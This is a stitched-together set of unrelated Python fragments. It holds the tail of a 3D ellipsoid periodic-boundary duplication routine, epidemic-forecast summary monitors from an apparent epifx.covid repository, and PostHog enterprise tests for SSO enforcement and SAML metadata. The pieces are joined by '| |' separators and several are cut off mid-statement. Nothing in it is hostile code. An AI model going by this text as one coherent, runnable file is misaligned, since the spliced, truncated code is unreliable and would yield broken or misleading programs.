self.z+sim_depth, self.a, self.b, self.c, self.quat)
p6 = Ellipsoid(str(self.id)+'_RBB', self.x+sim_width, self.y +
sim_height, self.z+sim_depth, self.a, self.b, self.c, self.quat)
p7 = Ellipsoid(str(self.id)+'_LBB', self.x, self.y +
sim_height, self.z+sim_depth, self.a, self.b, self.c, self.quat)
elif right and top and front:
p1 = Ellipsoid(str(self.id)+'_RBF', self.x, self.y +
sim_height, self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_LBF', self.x-sim_width, self.y +
sim_height, self.z, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_LTF', self.x-sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p4 = Ellipsoid(str(self.id)+'_RTB', self.x, self.y,
self.z+sim_depth, self.a, self.b, self.c, self.quat)
p5 = Ellipsoid(str(self.id)+'_RBB', self.x, self.y +
sim_height, self.z+sim_depth, self.a, self.b, self.c, self.quat)
p6 = Ellipsoid(str(self.id)+'_LBB', self.x-sim_width, self.y +
sim_height, self.z+sim_depth, self.a, self.b, self.c, self.quat)
p7 = Ellipsoid(str(self.id)+'_LTB', self.x-sim_width, self.y,
self.z+sim_depth, self.a, self.b, self.c, self.quat)
elif right and bottom and front:
p1 = Ellipsoid(str(self.id)+'_LBF', self.x-sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_LTF', self.x-sim_width, self.y -
sim_height, self.z, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_RTF', self.x, self.y -
sim_height, self.z, self.a, self.b, self.c, self.quat)
p4 = Ellipsoid(str(self.id)+'_RBB', self.x, self.y,
self.z+sim_depth, self.a, self.b, self.c, self.quat)
p5 = Ellipsoid(str(self.id)+'_LBB', self.x-sim_width, self.y,
self.z+sim_depth, self.a, self.b, self.c, self.quat)
p6 = Ellipsoid(str(self.id)+'_LTB', self.x-sim_width, self.y -
sim_height, self.z+sim_depth, self.a, self.b, self.c, self.quat)
p7 = Ellipsoid(str(self.id)+'_RTB', self.x, self.y -
sim_height, self.z+sim_depth, self.a, self.b, self.c, self.quat)
elif left and bottom and front:
p1 = Ellipsoid(str(self.id)+'_LTF', self.x, self.y -
sim_height, self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_RTF', self.x+sim_width, self.y -
sim_height, self.z, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_RBF', self.x+sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p4 = Ellipsoid(str(self.id)+'_LBB', self.x, self.y,
self.z+sim_depth, self.a, self.b, self.c, self.quat)
p5 = Ellipsoid(str(self.id)+'_LTB', self.x, self.y -
sim_height, self.z+sim_depth, self.a, self.b, self.c, self.quat)
p6 = Ellipsoid(str(self.id)+'_RTB', self.x+sim_width, self.y -
sim_height, self.z+sim_depth, self.a, self.b, self.c, self.quat)
p7 = Ellipsoid(str(self.id)+'_RBB', self.x+sim_width, self.y,
self.z+sim_depth, self.a, self.b, self.c, self.quat)
elif left and top and back:
p1 = Ellipsoid(str(self.id)+'_RTB', self.x+sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_RBB', self.x+sim_width, self.y +
sim_height, self.z, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_LBB', self.x, self.y +
sim_height, self.z, self.a, self.b, self.c, self.quat)
p4 = Ellipsoid(str(self.id)+'_LTF', self.x, self.y,
self.z-sim_depth, self.a, self.b, self.c, self.quat)
p5 = Ellipsoid(str(self.id)+'_RTF', self.x+sim_width, self.y,
self.z-sim_depth, self.a, self.b, self.c, self.quat)
p6 = Ellipsoid(str(self.id)+'_RBF', self.x+sim_width, self.y +
sim_height, self.z-sim_depth, self.a, self.b, self.c, self.quat)
p7 = Ellipsoid(str(self.id)+'_LBF', self.x, self.y +
sim_height, self.z-sim_depth, self.a, self.b, self.c, self.quat)
elif right and top and back:
p1 = Ellipsoid(str(self.id)+'_RBB', self.x, self.y +
sim_height, self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_LBB', self.x-sim_width, self.y +
sim_height, self.z, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_LTB', self.x-sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p4 = Ellipsoid(str(self.id)+'_RTF', self.x, self.y,
self.z-sim_depth, self.a, self.b, self.c, self.quat)
p5 = Ellipsoid(str(self.id)+'_RBF', self.x, self.y +
sim_height, self.z-sim_depth, self.a, self.b, self.c, self.quat)
p6 = Ellipsoid(str(self.id)+'_LBF', self.x-sim_width, self.y +
sim_height, self.z-sim_depth, self.a, self.b, self.c, self.quat)
p7 = Ellipsoid(str(self.id)+'_LTF', self.x-sim_width, self.y,
self.z-sim_depth, self.a, self.b, self.c, self.quat)
elif right and bottom and back:
p1 = Ellipsoid(str(self.id)+'_LBB', self.x-sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_LTB', self.x-sim_width, self.y -
sim_height, self.z, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_RTB', self.x, self.y -
sim_height, self.z, self.a, self.b, self.c, self.quat)
p4 = Ellipsoid(str(self.id)+'_RBF', self.x, self.y,
self.z-sim_depth, self.a, self.b, self.c, self.quat)
p5 = Ellipsoid(str(self.id)+'_LBF', self.x-sim_width, self.y,
self.z-sim_depth, self.a, self.b, self.c, self.quat)
p6 = Ellipsoid(str(self.id)+'_LTF', self.x-sim_width, self.y -
sim_height, self.z-sim_depth, self.a, self.b, self.c, self.quat)
p7 = Ellipsoid(str(self.id)+'_RTF', self.x, self.y -
sim_height, self.z-sim_depth, self.a, self.b, self.c, self.quat)
elif left and bottom and back:
p1 = Ellipsoid(str(self.id)+'_LTB', self.x, self.y -
sim_height, self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_RTB', self.x+sim_width, self.y -
sim_height, self.z, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_RBB', self.x+sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p4 = Ellipsoid(str(self.id)+'_LBF', self.x, self.y,
self.z-sim_depth, self.a, self.b, self.c, self.quat)
p5 = Ellipsoid(str(self.id)+'_LTF', self.x, self.y -
sim_height, self.z-sim_depth, self.a, self.b, self.c, self.quat)
p6 = Ellipsoid(str(self.id)+'_RTF', self.x+sim_width, self.y -
sim_height, self.z-sim_depth, self.a, self.b, self.c, self.quat)
p7 = Ellipsoid(str(self.id)+'_RBF', self.x+sim_width, self.y,
self.z-sim_depth, self.a, self.b, self.c, self.quat)
duplicates.extend([p1, p2, p3, p4, p5, p6, p7])
return duplicates
# If it collides with any two faces: Create 3 duplicates
elif sum([left, top, right, bottom, front, back]) == 2:
if left and top:
p1 = Ellipsoid(str(self.id)+'_RT', self.x+sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_LB', self.x, self.y +
sim_height, self.z, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_RB', self.x+sim_width, self.y +
sim_height, self.z, self.a, self.b, self.c, self.quat)
elif right and top:
p1 = Ellipsoid(str(self.id)+'_LT', self.x-sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_LB', self.x-sim_width, self.y +
sim_height, self.z, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_RB', self.x, self.y +
sim_height, self.z, self.a, self.b, self.c, self.quat)
elif left and bottom:
p1 = Ellipsoid(str(self.id)+'_RB', self.x+sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_LT', self.x, self.y -
sim_height, self.z, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_RT', self.x+sim_width, self.y -
sim_height, self.z, self.a, self.b, self.c, self.quat)
elif right and bottom:
p1 = Ellipsoid(str(self.id)+'_LB', self.x-sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_RT', self.x, self.y -
sim_height, self.z, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_LT', self.x-sim_width, self.y -
sim_height, self.z, self.a, self.b, self.c, self.quat)
elif front and top:
p1 = Ellipsoid(str(self.id)+'_FB', self.x, self.y +
sim_height, self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_BT', self.x, self.y,
self.z+sim_depth, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_BB', self.x, self.y +
sim_height, self.z+sim_depth, self.a, self.b, self.c, self.quat)
elif front and bottom:
p1 = Ellipsoid(str(self.id)+'_FT', self.x, self.y -
sim_height, self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_BT', self.x, self.y -
sim_height, self.z+sim_depth, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_BB', self.x, self.y,
self.z+sim_depth, self.a, self.b, self.c, self.quat)
elif back and top:
p1 = Ellipsoid(str(self.id)+'_BB', self.x, self.y +
sim_height, self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_FT', self.x, self.y,
self.z-sim_depth, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_FB', self.x, self.y +
sim_height, self.z-sim_depth, self.a, self.b, self.c, self.quat)
elif back and bottom:
p1 = Ellipsoid(str(self.id)+'_BT', self.x, self.y -
sim_height, self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_FT', self.x, self.y -
sim_height, self.z-sim_depth, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_FB', self.x, self.y,
self.z-sim_depth, self.a, self.b, self.c, self.quat)
elif front and right:
p1 = Ellipsoid(str(self.id)+'_FL', self.x-sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_BR', self.x, self.y,
self.z+sim_depth, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_BL', self.x-sim_width, self.y,
self.z+sim_depth, self.a, self.b, self.c, self.quat)
elif front and left:
p1 = Ellipsoid(str(self.id)+'_FR', self.x+sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_BL', self.x, self.y,
self.z+sim_depth, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_BR', self.x+sim_width, self.y,
self.z+sim_depth, self.a, self.b, self.c, self.quat)
elif back and right:
p1 = Ellipsoid(str(self.id)+'_BL', self.x-sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_FR', self.x, self.y,
self.z-sim_depth, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_FL', self.x-sim_width, self.y,
self.z-sim_depth, self.a, self.b, self.c, self.quat)
elif back and left:
p1 = Ellipsoid(str(self.id)+'_BR', self.x+sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_FL', self.x, self.y,
self.z-sim_depth, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_FR', self.x+sim_width, | |
<reponame>ruarai/epifx.covid
from functools import reduce
import h5py
import logging
import numpy as np
import pypfilt.check as check
import pypfilt.context
import pypfilt.obs
import pypfilt.resample
import pypfilt.state
import pypfilt.stats as stats
import pypfilt.summary
from pypfilt.summary import Table, Monitor, obs_types
class PrOutbreak(Table):
"""
Record the daily outbreak probability, defined as the sum of the weights
of all particles in which an outbreak has been seeded.
:param name: the name of the table in the output file.
"""
def dtype(self, ctx, obs_list, name):
self.__model = ctx.component['model']
self.__time = ctx.component['time']
return [ctx.component['time'].dtype('date'), ('pr', np.float64)]
def n_rows(self, start_date, end_date, n_days, n_sys, forecasting):
return n_days
def add_rows(self, hist, weights, fs_date, dates, obs_types, insert_fn):
for date, ix, hist_ix in dates:
mask = self.__model.is_seeded(hist[hist_ix])
seeded_weights = weights[ix, :] * mask
date_enc = self.__time.to_dtype(date)
insert_fn((date_enc, np.sum(seeded_weights)))
class PeakMonitor(Monitor):
"""Record epidemic peak forecasts, for use with other statistics."""
peak_size = None
"""
A dictionary that maps observation systems to the size of each particle's
peak with respect to that system: ``peak_size[(unit, period)]``.
Note that this is **only** valid for tables to inspect in the
``finished()`` method, and **not** in the ``add_rows()`` method.
"""
peak_date = None
"""
A dictionary that maps observation systems to the date of each particle's
peak with respect to that system: ``peak_date[(unit, period)]``.
Note that this is **only** valid for tables to inspect in the
``finished()`` method, and **not** in the ``add_rows()`` method.
"""
peak_time = None
"""
A dictionary that maps observation systems to the time of each particle's
peak with respect to that system, measured in (fractional) days from the
start of the forecasting period: ``peak_time[(unit, period)]``.
Note that this is **only** valid for tables to inspect in the
``finished()`` method, and **not** in the ``add_rows()`` method.
"""
peak_weight = None
"""
A dictionary that maps observation systems to the weight of each
particle at the time that its peak occurs:
``peak_weight[(unit, period)]``.
Note that this is **only** valid for tables to inspect in the
``finished()`` method, and **not** in the ``add_rows()`` method.
"""
expected_obs = None
"""
The expected observation for each particle for the duration of the
**current simulation window**.
Note that this is **only** valid for tables to inspect in each call to
``add_rows()``, and **not** in a call to ``finished()``.
"""
simulated_obs = None
"""
Simulated observations for each particle for the duration of the
**current simulation window**.
Note that this is **only** valid for tables to inspect in each call to
``add_rows()``, and **not** in a call to ``finished()``.
"""
def __init__(self, exp_obs_monitor):
"""
:param exp_obs_monitor: the name of a
:class:`pypfilt.summary.ExpectedObsMonitor`.
"""
self.__run = None
self.__loaded_from_cache = False
self.__monitor_name = exp_obs_monitor
def prepare(self, ctx, obs_list, name):
self.__monitor = ctx.component['summary_monitor'][self.__monitor_name]
self.__ctx = ctx
self.__params = ctx.params
self.__obs_types = obs_types(ctx, obs_list)
self.__rnd = np.random.default_rng(ctx.params.get('prng_seed'))
def begin_sim(self, start_date, end_date, n_days, n_sys, forecasting):
logger = logging.getLogger(__name__)
time_scale = self.__ctx.component['time']
if self.__run is None or self.__run != (start_date, end_date):
# For each particle, record the weight and peak time.
num_px = self.__params['size']
self.__run = (start_date, end_date)
if self.__loaded_from_cache:
logger.debug("Using cached monitor state")
self.__loaded_from_cache = False
# Adjust the cached peak_time data now that the simulation
# start date is known.
dt = (time_scale.to_scalar(start_date)
- time_scale.to_scalar(self.__loaded_from_date))
logger.debug("Adjusting peak_time by {} days".format(dt))
for k, v in self.peak_time.items():
self.peak_time[k] = v - dt
return
logger.debug("Initialising monitor state")
self.peak_size = {k: np.zeros(num_px) for k in self.__obs_types}
self.peak_time = {k: np.zeros(num_px) for k in self.__obs_types}
self.peak_date = {k: np.empty(num_px, dtype='O')
for k in self.__obs_types}
self.peak_weight = {k: np.zeros(num_px) for k in self.__obs_types}
elif self.__run is not None and self.__run == (start_date, end_date):
logger.debug("Ignoring monitor state")
else:
logger.debug("Deleting monitor state")
self.__run = None
self.peak_size = None
self.peak_time = None
self.peak_date = None
self.peak_weight = None
def end_sim(self, hist, weights, fs_date, dates, obs_types):
self.expected_obs = None
def days_to(self, date):
"""
Convert a date to the (fractional) number of days from the start of
the forecasting period.
"""
time_scale = self.__ctx.component['time']
return time_scale.to_scalar(date)
def monitor(self, hist, weights, fs_date, dates, obs_types):
"""Record the peak for each particle during a forecasting run."""
self.expected_obs = self.__monitor.expected_obs
self.simulated_obs = {}
# Do nothing more if there are no dates to summarise.
num_dates = len(dates)
if num_dates == 0:
# Ensure an empty data structure exists, at least.
for (u, p) in obs_types:
self.simulated_obs[u, p] = np.array([])
return
periods = set([p for (_, p) in obs_types])
times = [date for (date, ix, hist_ix) in dates]
exp_shape = (len(times), self.__params['size'])
for (u, p) in obs_types:
self.simulated_obs[u, p] = np.zeros(exp_shape)
# Resampling can change the particle order, so we need to iterate over
# the particle chronologically, and reorder the arrays whenever
# resampling occurs.
date_ix = 0
for date, ix, hist_ix in dates:
curr = hist[hist_ix]
prev_ixs = curr[:, -1].astype(int)
resampled = not np.all(np.diff(prev_ixs) == 1)
if resampled:
# Particles were resampled on this date.
# Adjust the arrays to reflect the new particle ordering.
for k in self.__obs_types:
self.peak_weight[k] = self.peak_weight[k][prev_ixs]
self.peak_size[k] = self.peak_size[k][prev_ixs]
self.peak_date[k] = self.peak_date[k][prev_ixs]
self.peak_time[k] = self.peak_time[k][prev_ixs]
# Record the expected observations.
for p in periods:
n_back = self.__params['steps_per_unit'] * p
valid_types = [(u, pd) for (u, pd) in obs_types if p == pd]
for (u, p) in valid_types:
values = self.expected_obs[u, p][date_ix]
# Update the recorded peaks where appropriate.
mask = values > self.peak_size[u, p]
self.peak_size[u, p][mask] = values[mask]
self.peak_date[u, p][mask] = date
self.peak_time[u, p][mask] = self.days_to(date)
# Record the simulated observations
sim_values = pypfilt.obs.simulate(self.__ctx, date, u, p,
values, self.__rnd)
self.simulated_obs[u, p][date_ix] = sim_values
date_ix += 1
# Record the *final* weights.
for k in self.__obs_types:
self.peak_weight[k] = weights[-1]
def __obs_type_seq(self):
"""Return a generator that returns ``(obs_type, str_name)`` tuples."""
for u, p in self.__obs_types:
yield ((u, p), "{}/{}".format(u, p))
def load_state(self, grp):
"""Load the monitor state for disk."""
logger = logging.getLogger(__name__)
logger.debug("{}.load_state('{}')".format(self.__class__.__name__,
grp.name))
# Record the start date used in the cached simulation, as this defines
# the origin for the peak_time values.
time_scale = self.__ctx.component['time']
start_date_enc = grp['start_date'][()]
self.__loaded_from_date = time_scale.from_dtype(start_date_enc[0])
# Initialise the data structures.
self.peak_weight = {}
self.peak_size = {}
self.peak_time = {}
self.peak_date = {}
# Load the cached state for each observation type.
for (k, name) in self.__obs_type_seq():
logger.debug("Loading sub-group '{}'".format(name))
sub_grp = grp[name]
self.peak_weight[k] = sub_grp['peak_weight'][()]
self.peak_size[k] = sub_grp['peak_size'][()]
self.peak_time[k] = sub_grp['peak_time'][()]
peak_date = sub_grp['peak_date'][()]
self.peak_date[k] = np.array([time_scale.from_dtype(d)
for d in peak_date])
# Indicate that the monitor state has been loaded from a cache file,
# and that the peak_time data needs to be adjusted once the simulation
# start date is known.
self.__loaded_from_cache = True
def save_state(self, grp):
"""Save the monitor state to disk."""
logger = logging.getLogger(__name__)
logger.debug("{}.save_state('{}')".format(self.__class__.__name__,
grp.name))
# Save the start date, as this is the origin for the peak_time values.
time_scale = self.__ctx.component['time']
start_date_enc = np.array([time_scale.to_dtype(self.__run[0])])
if 'start_date' in grp:
# Delete existing data sets, in case they differ in size or type.
del grp['start_date']
grp.create_dataset('start_date', data=start_date_enc)
data_sets = ['peak_weight', 'peak_size', 'peak_time', 'peak_date']
for (k, name) in self.__obs_type_seq():
logger.debug("Saving sub-group '{}'".format(name))
sub_grp = grp.require_group(name)
# Delete existing data sets, in case they differ in size or type.
for ds in data_sets:
if ds in sub_grp:
del sub_grp[ds]
peak_date = np.array([time_scale.to_dtype(d)
for d in self.peak_date[k]])
sub_grp.create_dataset('peak_weight', data=self.peak_weight[k])
sub_grp.create_dataset('peak_size', data=self.peak_size[k])
sub_grp.create_dataset('peak_time', data=self.peak_time[k])
sub_grp.create_dataset('peak_date', data=peak_date)
class ThresholdMonitor(Monitor):
"""Record when expected observations exceed a specific threshold."""
exceed_date = None
"""
A dictionary that maps observation systems to the date when each particle
exceeded the specific threshold: ``exceed_date[(unit, period)]``.
Note that this is **only** valid for tables to inspect in the
``finished()`` method, and **not** in the ``add_rows()`` method.
"""
exceed_weight = None
"""
A dictionary that maps observation systems to the **final** weight of each
particle: ``exceed_weight``.
Note that this is **only** valid for tables to inspect in the
``finished()`` method, and **not** in the ``add_rows()`` method.
"""
exceed_mask = None
"""
A dictionary that maps observation systems to Boolean arrays that indicate
which particles have exceeded the threshold:
``exceed_mask[(unit, period)]``.
Note that this is **only** valid for tables to inspect in the
| |
import datetime
import os
import uuid
from typing import cast
from unittest.mock import patch
import pytest
from django.core import mail
from django.core.exceptions import ValidationError
from django.test import override_settings
from django.utils import timezone
from freezegun.api import freeze_time
from rest_framework import status
from social_core.exceptions import AuthFailed, AuthMissingParameter
from ee.api.test.base import APILicensedTest
from ee.models.license import License
from posthog.constants import AvailableFeature
from posthog.models import OrganizationMembership, User
from posthog.models.organization_domain import OrganizationDomain
SAML_MOCK_SETTINGS = {
"SOCIAL_AUTH_SAML_SECURITY_CONFIG": {
"wantAttributeStatement": False, # already present in settings
"allowSingleLabelDomains": True, # to allow `http://testserver` in tests
},
}
GOOGLE_MOCK_SETTINGS = {
"SOCIAL_AUTH_GOOGLE_OAUTH2_KEY": "google_key",
"SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET": "google_secret",
}
GITHUB_MOCK_SETTINGS = {
"SOCIAL_AUTH_GITHUB_KEY": "github_key",
"SOCIAL_AUTH_GITHUB_SECRET": "github_secret",
}
CURRENT_FOLDER = os.path.dirname(__file__)
class TestEELoginPrecheckAPI(APILicensedTest):
CONFIG_AUTO_LOGIN = False
def test_login_precheck_with_enforced_sso(self):
OrganizationDomain.objects.create(
domain="witw.app",
organization=self.organization,
verified_at=timezone.now(),
sso_enforcement="google-oauth2",
)
User.objects.create_and_join(self.organization, "<EMAIL>", self.CONFIG_PASSWORD)
with self.settings(**GOOGLE_MOCK_SETTINGS):
response = self.client.post("/api/login/precheck", {"email": "<EMAIL>"})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json(), {"sso_enforcement": "google-oauth2", "saml_available": False})
def test_login_precheck_with_unverified_domain(self):
OrganizationDomain.objects.create(
domain="witw.app",
organization=self.organization,
verified_at=None, # note domain is not verified
sso_enforcement="google-oauth2",
)
with self.settings(**GOOGLE_MOCK_SETTINGS):
response = self.client.post(
"/api/login/precheck", {"email": "<EMAIL>"}
) # Note we didn't create a user that matches, only domain is matched
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json(), {"sso_enforcement": None, "saml_available": False})
def test_login_precheck_with_inexistent_account(self):
OrganizationDomain.objects.create(
domain="anotherdomain.com",
organization=self.organization,
verified_at=timezone.now(),
sso_enforcement="github",
)
User.objects.create_and_join(self.organization, "<EMAIL>", self.CONFIG_PASSWORD)
with self.settings(**GITHUB_MOCK_SETTINGS):
response = self.client.post("/api/login/precheck", {"email": "<EMAIL>"})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json(), {"sso_enforcement": "github", "saml_available": False})
def test_login_precheck_with_enforced_sso_but_improperly_configured_sso(self):
OrganizationDomain.objects.create(
domain="witw.app",
organization=self.organization,
verified_at=timezone.now(),
sso_enforcement="google-oauth2",
)
User.objects.create_and_join(self.organization, "<EMAIL>", self.CONFIG_PASSWORD)
response = self.client.post(
"/api/login/precheck", {"email": "<EMAIL>"}
) # Note Google OAuth is not configured
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json(), {"sso_enforcement": None, "saml_available": False})
class TestEEAuthenticationAPI(APILicensedTest):
CONFIG_EMAIL = "<EMAIL>"
def create_enforced_domain(self, **kwargs) -> OrganizationDomain:
return OrganizationDomain.objects.create(
**{
"domain": "posthog.com",
"organization": self.organization,
"verified_at": timezone.now(),
"sso_enforcement": "google-oauth2",
**kwargs,
}
)
def test_can_enforce_sso(self):
self.client.logout()
# Can log in with password with SSO configured but not enforced
with self.settings(**GOOGLE_MOCK_SETTINGS):
response = self.client.post("/api/login", {"email": self.CONFIG_EMAIL, "password": <PASSWORD>})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json(), {"success": True})
# Forcing SSO disables regular API password login
self.create_enforced_domain()
with self.settings(**GOOGLE_MOCK_SETTINGS):
response = self.client.post("/api/login", {"email": self.CONFIG_EMAIL, "password": self.CONFIG_PASSWORD})
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(
response.json(),
{
"type": "validation_error",
"code": "sso_enforced",
"detail": "You can only login with SSO for this account (google-oauth2).",
"attr": None,
},
)
def test_can_enforce_sso_on_cloud_enviroment(self):
self.client.logout()
License.objects.filter(pk=-1).delete() # No instance licenses
self.create_enforced_domain()
self.organization.available_features = ["sso_enforcement"]
self.organization.save()
with self.settings(**GOOGLE_MOCK_SETTINGS):
response = self.client.post("/api/login", {"email": self.CONFIG_EMAIL, "password": self.CONFIG_PASSWORD})
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(
response.json(),
{
"type": "validation_error",
"code": "sso_enforced",
"detail": "You can only login with SSO for this account (google-oauth2).",
"attr": None,
},
)
def test_cannot_reset_password_with_enforced_sso(self):
self.create_enforced_domain()
with self.settings(
**GOOGLE_MOCK_SETTINGS, EMAIL_HOST="localhost", SITE_URL="https://my.posthog.net",
):
response = self.client.post("/api/reset/", {"email": "<EMAIL>"})
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(
response.json(),
{
"type": "validation_error",
"code": "sso_enforced",
"detail": "Password reset is disabled because SSO login is enforced for this domain.",
"attr": None,
},
)
self.assertEqual(len(mail.outbox), 0)
@patch("posthog.models.organization_domain.logger.warning")
def test_cannot_enforce_sso_without_a_license(self, mock_warning):
self.client.logout()
self.license.valid_until = timezone.now() - datetime.timedelta(days=1)
self.license.save()
self.create_enforced_domain()
# Enforcement is ignored
with self.settings(**GOOGLE_MOCK_SETTINGS):
response = self.client.post("/api/login", {"email": self.CONFIG_EMAIL, "password": self.CONFIG_PASSWORD})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json(), {"success": True})
# Attempting to use SAML fails
with self.settings(**GOOGLE_MOCK_SETTINGS):
response = self.client.get("/login/google-oauth2/")
self.assertEqual(response.status_code, status.HTTP_302_FOUND)
self.assertIn("/login?error_code=improperly_configured_sso", response.headers["Location"])
# Ensure warning is properly logged for debugging
mock_warning.assert_called_with(
"🤑🚪 SSO is enforced for domain posthog.com but the organization does not have the proper license.",
domain="posthog.com",
organization=str(self.organization.id),
)
@pytest.mark.skip_on_multitenancy
@override_settings(**SAML_MOCK_SETTINGS)
class TestEESAMLAuthenticationAPI(APILicensedTest):
CONFIG_AUTO_LOGIN = False
organization_domain: OrganizationDomain = None # type: ignore
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.organization_domain = OrganizationDomain.objects.create(
domain="posthog.com",
verified_at=timezone.now(),
organization=cls.organization,
jit_provisioning_enabled=True,
saml_entity_id="http://www.okta.com/exk1ijlhixJxpyEBZ5d7",
saml_acs_url="https://idp.hogflix.io/saml",
saml_x509_cert="""<KEY>
A1UECAwKQ2FsaWZ<KEY>WMBQGA1UEBwwNU2FuIEZyYW5jaXNjbzENMAsGA1UECgwET2t0YTEU
MBIGA1UECwwLU1NPUHJvdmlkZXIxFTATBgNVBAMMDGRldi0xMzU1NDU1NDEcMBoGCSqGSIb3DQEJ
ARYNaW5mb0Bva3RhLmNvbTAeFw0yMTA4MjExMTIyMjNaFw0zMTA4MjExMTIzMjNaMIGUMQswCQYD
VQQGEwJVUzETMBEGA1UECAwKQ2FsaWZvcm5pYTEWMBQGA1UEBwwNU2FuIEZyYW5jaXNjbzENMAsG
A1UECgwET2t0YTEUMBIGA1UECwwLU1NPUHJvdmlkZXIxFTATBgNVBAMMDGRldi0xMzU1NDU1NDEc
MBoGCSqGSIb3DQEJARYNaW5mb0Bva3RhLmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC
ggEBAMb1IcGzor7mGsGR0AsyzQaT0O9S1SVvdkG3z2duEU/I/a4fvaECm9xvVH7TY+RwwXcnkMst
+ZZJVkTtnUGLn0oSbcwJ1iJwWNOctaNlaJtPDLvJTJpFB857D2tU01/zPn8UpBebX8tJSIcvnvyO
Iblums97f9tlsI9GHqX5N1e1TxRg6FB2ba46mgb0EdzLtPxdYDVf8b5+V0EWp0fu5nbu5T4T+1Tq
IVj2F1xwFTdsHnzh7FP92ohRRl8WQuC1BjAJTagGmgtfxQk2MW0Ti7Dl0Ejcwcjp7ezbyOgWLBmA
fJ/Sg/MyEX11+4H+VQ8bGwIYtTM2Hc+W6gnhg4IdIfcCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEA
Ef8AeVm+rbrDqil8GwZz/6mTeSHeJgsYZhJqCsaVkRPe03+NO93fRt28vlDQoz9alzA1I1ikjmfB
W/+x2dFPThR1/G4zGfF5pwU13gW1fse0/bO564f6LrmWYawL8SzwGbtelc9DxPN1X5g8Qk+j4DNm
jSjV4Oxsv3ogajnnGYGv22iBgS1qccK/cg41YkpgfP36HbiwA10xjUMv5zs97Ljep4ejp6yoKrGL
dcKmj4EG6bfcI3KY6wK46JoogXZdHDaFP+WOJNj/pJ165hYsYLcqkJktj/rEgGQmqAXWPOXHmFJb
5FPleoJTchctnzUw+QfmSsLWQ838/<KEY>==""",
)
# SAML Metadata
def test_can_get_saml_metadata(self):
self.client.force_login(self.user)
OrganizationMembership.objects.filter(organization=self.organization, user=self.user).update(
level=OrganizationMembership.Level.ADMIN
)
response = self.client.get("/api/saml/metadata/")
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue("/complete/saml/" in response.content.decode())
def test_need_to_be_authenticated_to_get_saml_metadata(self):
response = self.client.get("/api/saml/metadata/")
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertEqual(response.json(), self.unauthenticated_response())
def test_only_admins_can_get_saml_metadata(self):
self.client.force_login(self.user)
